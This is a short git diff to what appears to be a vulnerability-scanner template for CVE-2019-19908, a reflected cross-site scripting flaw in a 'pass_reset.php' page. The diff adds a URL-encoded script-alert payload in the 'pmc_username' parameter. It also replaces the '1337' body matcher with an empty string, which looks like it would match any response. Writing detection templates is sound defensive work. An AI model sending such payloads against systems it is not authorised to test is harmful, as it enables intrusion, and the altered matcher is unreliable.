diff --git a/cves/CVE-2019-19908.yaml b/cves/CVE-2019-19908.yaml index 8bfe9466f3..732b598d49 100644 --- a/cves/CVE-2019-19908.yaml +++ b/cves/CVE-2019-19908.yaml @@ -8,12 +8,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=">" + - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C" matchers: - type: status status: - 200 - type: word words: - - "1337" + - "" part: body